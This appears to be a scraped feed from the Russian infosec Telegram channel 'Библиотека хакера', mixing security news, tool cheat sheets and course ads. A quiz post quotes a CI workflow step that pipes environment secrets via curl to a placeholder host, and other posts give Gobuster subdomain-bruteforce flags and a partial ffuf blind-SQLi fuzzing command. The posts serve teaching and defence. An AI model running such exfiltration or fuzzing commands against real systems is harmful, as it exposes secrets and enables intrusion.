Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность

🔊 Как обычный саундбар превратили в инструмент для взлома ПК Исследователь изучал прошивку Creative Sound Blaster Katana V2X, а в итоге обнаружил цепочку уязвимостей, позволяющую удалённо перепрошить устройство по Bluetooth без сопряжения. После модификации прошивки саундбар мог:

— выполнять роль HID-клавиатуры; — автоматически вводить команды на подключённом компьютере; — фактически работать как беспроводной Rubber Ducky.

❕ Атака не требовала физического доступа к ПК или самому устройству. 🔗 В статье: реверс прошивки, анализ BLE-протокола, обход механизмов защиты и создание собственного payload для устройства. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #breach_breakdown

🏃‍♀️ Эксплуатация race condition с помощью Turbo Intruder: гайд для начинающего этичного хакера Уязвимости race condition часто встречаются в веб-приложениях и приносят достойные вознаграждения в рамках багбаунти. Под катом вас ждет гайд по эксплуатации данного бага на примере Vulnerable PHP App (Race Condition). 👉 Читать 🔹 Курс «Основы IT для непрограммистов» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #ликбез

⛽ ATG под атакой: хакеры добрались до топливной инфраструктуры США CISA, ФБР, NSA и Министерство энергетики США выпустили совместный алерт о кибератаках на ATG — системы мониторинга топливных резервуаров. 🔜 Такие устройства показывают уровень топлива, температуру и возможные утечки. Их ставят на заправках, промышленных объектах, в энергетике и транспортной инфраструктуре. Что известно:

— под ударом ATG, доступные из интернета; — часть устройств использует дефолтные или слабые пароли; — Shadowserver нашёл 1061 открытую ATG-систему на 10001/tcp, 909 из них — в США; — после взлома можно менять настройки, отключать уведомления и маскировать проблемы с резервуарами.

📍 Навигация: [Вакансии] 🐸 Библиотека хакера #breach_breakdown

🔥 Инженерная методичка по ИИ от Романа Барлоса (Team Lead в Yandex Cloud) Продолжаем делиться экспертизой команды курса «Разработка ИИ-агентов». Роман собрал мастхев-инструменты и ключевые работы для тех, кто хочет выйти за рамки вайбкодинга. 🛠 Полезные инструменты:

• Understand Anything — граф знаний по коду и зависимостям. • DeepTutor — open-source платформа для персонализированного обучения. • Superpowers — набор практик для системной разработки с ИИ. • Awesome Agent Skills — коллекция навыков для ИИ-агентов.

📚  Ключевые работы по LLM:

• Attention Is All You Need (2017) — архитектура Transformer. • GPT-1 (2018) — начало эпохи GPT. • GPT-2 (2019) — решение новых задач без дообучения. • GPT-3 (2020) — обучение на примерах из запроса. • InstructGPT (2022) — RLHF и современные чат-боты.

На курсе Роман выступает консультантом программы: помогает формировать содержание уроков с опорой на актуальные инженерные практики». Занять свое место на потоке: 👉 Курс «Разработка ИИ-агентов»

🚩 Gobuster DNS Mode — полезные флаги для поиска поддоменов Если используете Gobuster для DNS-брутфорса, эти параметры стоит держать под рукой: 🈶 -d, --domain Указать целевой домен:

-d target.com 

🈶 -i, --show-ips Показывать IP-адреса найденных поддоменов. 🈶 -c, --show-cname Отображать CNAME-записи. 🈶 --wildcard Продолжить работу даже при обнаружении wildcard DNS. 🈶 --resolver Использовать свой DNS-резолвер:

--resolver 8.8.8.8 

Полезно при разведке внешней поверхности атаки и перечислении поддоменов. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #cheat_sheet #recon #gobuster

🐧 Шпаргалка по работе с командой less в Linux: на заметку этичному хакеру Команда less позволяет перематывать текст не только вперёд, но и назад, осуществлять поиск в обоих направлениях, переходить сразу в конец или в начало файла. 👉 Источник 🔹 Практический интенсив «Архитектуры и шаблоны проектирования» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

🗺 Как DPI распознаёт MTProto-прокси Полезный технический разбор про то, почему одной маскировки под TLS уже недостаточно. В статье объясняют:

— как работает Fake-TLS в MTProto; — почему JA3/JA4 fingerprint помогает находить неидеальный TLS; — как DPI анализирует размеры пакетов, тайминги и keep-alive; — почему зашифрованный payload всё равно оставляет сетевые метаданные; — где упирается предел DPI из-за стоимости глубокого анализа.

🔗 Читать подробнее 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #resource_drop

😎 Знакомьтесь с экспертом Proglib.academy: Senior Software Engineer и Team Lead в Yandex Cloud Роман Барлос Роман — консультант нашего курса «Разработка ИИ-агентов». Он работает на стыке cloud-native архитектуры и AI, активно внедряя современные ИИ-подходы в реальные процессы разработки. За что его ценит IT-комьюнити? 🟣 Team Lead и AI-евангелист в команде UX Yandex Cloud

14-лет в разработке. Занимается AI-адопшеном в команде Yandex Cloud, проводит мастер-классы и продвигает лучшие практики для повышения эффективности разработчиков.

🟣 Техлид Sourcecraft Code Assistant

С сильным практическим бэкграундом принимал участие как технический лид в создании мощного AI-расширения для VS Code.

🟣 Создатель полезного Open Source

Разрабатывает утилиты, которые позволяют быстро начать эксперименты с инференсом и агентами в локальном окружении: например, набор скриптов vllm-setup для быстрого запуска окружения и mini-proxy — минималистичный прокси для OpenAI API провайдеров.

🟣 Автор интерактивных ML-визуализаций

Объясняет сложные концепции наглядно. Создал серию залипательных обучающих материалов, где можно вживую пощупать работу сетей Хопфилда, машин Больцмана и VC-размерности.

Роман регулярно делится инженерными наработками, инсайтами и экспертизой в своем авторском Telegram-канале На курсе Роман выступает консультантом программы: он помогает формировать содержание уроков с опорой на актуальные инженерные практики и жесткие требования индустрии. Узнать больше о программе и разработке автономных систем: 👉 Курс «Разработка ИИ-агентов» Так, продолжаем знакомить вас с командой? 👍 — Да, ждем новых лиц 🔥 — Жду полезные материалы от Романа

Как заплачено, так и нафигачено! 🤪 🐸 Библиотека хакера #hack_humor

🐧 Шпаргалка по работе с утилитой cron и правам для файлов в Linux: на заметку этичному хакеру 🔹 Курс «Алгоритмы и структуры данных» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

💡 Крупнейший каталог OSINT-инструментов В каталоге собрано более 1300 инструментов, разбитых на десятки категорий:

— Telegram — Социальные сети — Email и Username Search — Геолокация — Анализ доменов и IP — Утечки данных — Metadata Analysis — Threat Intelligence

➡️ Что удобно: — поиск по инструментам; — автоматическое обновление из GitHub; — более 50 категорий; — веб-версия, Android и desktop-клиент. Полезная закладка для OSINT-специалистов, расследователей, багхантеров и пентестеров. 🔗 Ссылка 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #resource_drop

🧩 Хакер-челлендж Сценарий: в open source-репозиторий прилетает pull request с “безобидным” изменением GitHub Actions workflow. Внутри добавили шаг:

- name: Debug publish   run: |     env | base64 | curl -s -X POST https://example[.]com/logs -d @-

Автор PR пишет:

«Оптимизировал publish pipeline и добавил debug output для диагностики релизов».

❓ Что здесь нужно проверять в первую очередь? Голосуйте эмодзи: 🔥 — Exfiltration of CI/CD secrets: workflow пытается вывести переменные окружения и секреты наружу. 👾 — Dependency confusion: пакет подтягивается из внешнего registry. ❤️ — Cache poisoning: атакующий подменяет build cache. 👍 — Path traversal: workflow читает файлы за пределами проекта. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #ctf_challenge

⚡️ Продолжаем знакомить вас с экспертами курса AgentOps! — Сергей Нотевский расскажет, как выстроить FinOps для AI-продуктов: оптимизировать затраты на разработку и продакшен, внедрить model routing, semantic cache и систему алертов для контроля расходов — Эмиль Сатаев разберет Context Engineering: управление контекстом, защиту от prompt injection, работу с длинными контекстами и построение безопасного пайплайна входа для AI-систем — Михаил Бондаревский покажет, как подготовить инфраструктуру для AI-агентов: Docker, sandboxing, streaming, docker-compose и воспроизводимое окружение для разработки и продакшена — Мурат Хажгериев расскажет про Enterprise Integrations & MCP: когда MCP действительно нужен, как подключать внешние сервисы и реализовывать интеграции с OAuth2 delegation — Герман Сабиров разберет Governance & Compliance для AI-систем: data flow, audit logs, требования 152-ФЗ, локализацию данных и построение compliance-подхода на уровне архитектуры Курс для backend-разработчиков, тимлидов и LLM инженеров о том, как внедрять AI-логику в бэкенд IT-продуктов и сохранять стабильность сервиса. 👉 Изучить обновленную программу AgentOps и занять место.

💻 Практика атак на Kubernetes Kubernetes Goat — это специально уязвимый Kubernetes-кластер для обучения безопасности на практике. ➡️ Что внутри: — ошибки RBAC и лишние привилегии — уязвимые контейнеры — небезопасные настройки кластера — privilege escalation — container escape — практические сценарии для Red Team и Blue Team Отличная площадка для изучения атак на Kubernetes в безопасной среде ✅ 🔗 Ссылка на GitHub 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #tool_of_the_week

Подрядчик подключился к вашей системе. Работу сделал. Доступ остался. Знакомая ситуация? В какой-то момент становится сложно ответить на простой вопрос, кто сейчас вообще подключен к вашим ИТ-ресурсам и что там делает. Именно в таких сценариях чаще всего начинаются проблемы. Доступы выдаются быстро, а потом про них забывают. Контроль снижается, а одной ошибки или компрометации бывает достаточно, чтобы затронуть важные для компании системы. В канале Индид вы найдете материалы о том, как выстраивать защиту учетных данных, снижать риски инцидентов и всегда держать доступ к инфраструктуре под контролем. В нем вы сможете забрать гайд по работе с подрядчиками. Внутри: 📍 Ключевые риски ИБ при работе с подрядчиками 📍 Способы атак злоумышленников и их последствия 📍 Меры безопасности, регламентирующие получение прав доступа Подписывайтесь на канал Индид, чтобы регулярно читать практические материалы о защите доступа. #реклама О рекламодателе

Они прогрессируют, уже пытаются маскироваться под людей 🔹 Курс разработка AI-агентов 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #небагафича

⚡️ Blind SQLi через время ответа в ffuf При поиске Blind SQL Injection не всегда есть ошибки в ответе приложения. Иногда единственный признак — увеличение времени ответа. Команда для поиска параметров с задержкой:

  -w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt \
  -fc 404 \
  -mt 5000

🈂️ -mt 5000 — покажет только ответы дольше 5 секунд 🈂️ Задержка может указывать на time-based Blind SQLi 🈂️ Удобно для первичного скрининга параметров без ручной проверки ⚠️ Не забывайте исключать ложные срабатывания из-за медленных API, rate limiting и сетевых задержек. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #cheat_sheet

🛣 Penetration Testing Roadmap — коллекция ресурсов, сертификатов, инструментов и методологий, которые помогут вам стать экспертом в области пентеста. 👉 GitHub & Сайт 🔹 Курс «Алгоритмы и структуры данных» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

🔥 Автоматизация пентеста через AI-агентов Pentest Swarm AI агенты обмениваются находками между собой и самостоятельно выбирают следующие шаги атаки на основе уже собранных данных. Что умеет: 🔘 Поиск поддоменов 🔘 Сканирование портов 🔘 Поиск уязвимостей 🔘 Эксплуатация находок 🔘 Генерация отчётов Есть готовые сценарии для Bug Bounty, CTF и анализа внешней поверхности атаки. 🔗 GitHub 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #tool_of_the_week

⚡️ Последний шанс забрать курсы со СКИДКОЙ 40%! Прокачайте свой мозг правильно До конца акции вы можете воспользоваться специальными ценами на самые востребованные IT-направления. Круто и выгодно прокачать свои скиллы, чтобы получить оффер, уехать на Бали и больше не быть онлайн 😎 ➡️ Разработка AI-агентов — от 49 000 ₽ (вместо 69 000 ₽) Курс про контролируемую разработку ИИ-агентов: качество, стоимость, наблюдаемость и тестирование. С первого занятия — только практическая работа. ➡️ Курс AgentOps — 129 000 ₽ (вместо 149 000 ₽) Профессиональный трек для разработчиков и LLM инженеров о том, как правильно внедрять AI-логику в бэкенд и сохранять железную стабильность сервиса. ➡️ Математика для Data Science — от 29 990 ₽ (вместо 39 990 ₽) Вы научитесь решать сложные математические задачи, которые дают на собеседованиях на позицию дата-сайентиста в бигтехе. Отличная база для мощного старта в DS. ➡️ Курс Специалист по ИИ — 89 000 ₽ (вместо 113 900 ₽) Комплексная программа для получения профессии в сфере ИИ с нуля. За 8 месяцев вы соберете сильное портфолио из 5 реальных проектов и дипломной работы. ➡️ Архитектуры и шаблоны проектирования — 27 990 ₽ (вместо 37 900 ₽) Интенсив для разработчиков, который поможет освоить основные паттерны проектирования и прокачать навыки архитектора программного обеспечения. 🌸 Выбирайте направление, оставляйте заявку на сайте распродажи, и наш менеджер подробно вас проконсультирует